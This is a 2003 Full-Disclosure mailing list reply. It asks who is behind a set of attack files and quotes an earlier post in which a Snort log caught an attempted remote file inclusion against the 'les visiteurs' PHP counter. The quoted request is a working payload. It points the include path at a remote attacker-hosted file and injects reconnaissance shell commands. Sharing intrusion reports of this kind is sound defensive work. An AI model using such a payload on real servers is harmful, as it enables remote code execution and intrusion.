[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] file inclusion (les visiteurs)
- To: full-disclosure@lists.netsys.com
- Subject: Re: [Full-Disclosure] file inclusion (les visiteurs)
- From: Dan <dan@lockedbox.net>
- Date: Mon, 1 Dec 2003 17:02:16 +0000
This is the same set of files that I noticed last week(xfteam.net) it seems
they closed their domain down? (I cannot find it)
Does anyone know if these ppl are a real sec organisation? or just some
kiddies ?
Cheers,
Daniel.
"Evert Daman" <evert@digipix.org> wrote:
>
> last night snort detected this request:
>
> GET
>
/counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
>
>
> because i patched 'les visiteurs' as described by 'matthieu peschaud'
> on bugtraq on the 26 of october nothing happend, but it looks like someone
> is trying to exploit this bug.
> just want to mention it to this wonderfull list :)
>
> kind regards,
> Evert
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html